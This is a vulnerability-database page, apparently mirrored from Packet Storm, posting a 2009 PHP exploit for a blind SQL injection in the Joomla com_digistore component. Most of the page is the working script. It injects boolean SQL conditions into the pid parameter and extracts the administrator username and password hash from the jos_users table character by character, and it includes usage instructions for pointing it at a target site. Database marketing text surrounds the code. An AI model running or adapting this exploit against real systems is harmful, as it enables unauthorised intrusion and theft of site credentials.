Lucene search

K

Joomla Digistore Blind SQL Injection

๐Ÿ—“๏ธย 02 Mar 2009ย 00:00:00Reported byย Cyb3r-1sTTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 14ย Views

Joomla Digistore Blind SQL Injection exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<?php  
ini_set("max_execution_time",0);  
print_r('  
##############################################################################  
#  
# Joomla com_digistore (pid) Blind SQL Injection Exploit  
#  
# === Cyb3R-1sT ===  
# cyb3r-1st [at] hormail.com  
# inject0r5 t3am   
#  
# : Usage :  
#php file.php "http://site/index.php?option=com_digistore&task=show_product&pid=1"  
#  
# : Sp.GrEetZ :  
# [ All friends ] & [ www.7rs.org ] & [ www.tryag.com]   
#  
##############################################################################  
');  
if ($argc > 1) {  
$url = $argv[1];  
$r = strlen(file_get_contents($url."+and+1=1--"));  
echo "\nExploiting:\n";  
$w = strlen(file_get_contents($url."+and+1=0--"));  
$t = abs((100-($w/$r*100)));  
echo "Username: ";  
for ($i=1; $i <= 30; $i++) {  
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));  
if (abs((100-($laenge/$r*100))) > $t-1) {  
$count = $i;  
$i = 30;  
}  
}  
for ($j = 1; $j < $count; $j++) {  
for ($i = 46; $i <= 122; $i=$i+2) {  
if ($i == 60) {  
$i = 98;  
}  
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));  
if (abs((100-($laenge/$r*100))) > $t-1) {  
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));  
if (abs((100-($laenge/$r*100))) > $t-1) {  
echo chr($i-1);  
} else {  
echo chr($i);  
}  
$i = 122;  
}  
}  
}  
echo "\nPassword: ";  
for ($j = 1; $j <= 49; $j++) {  
for ($i = 46; $i <= 102; $i=$i+2) {  
if ($i == 60) {  
$i = 98;  
}  
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));  
if (abs((100-($laenge/$r*100))) > $t-1) {  
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));  
if (abs((100-($laenge/$r*100))) > $t-1) {  
echo chr($i-1);  
} else {  
echo chr($i);  
}  
$i = 102;  
}  
}  
}  
}   
?>  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Mar 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
14
.json
Report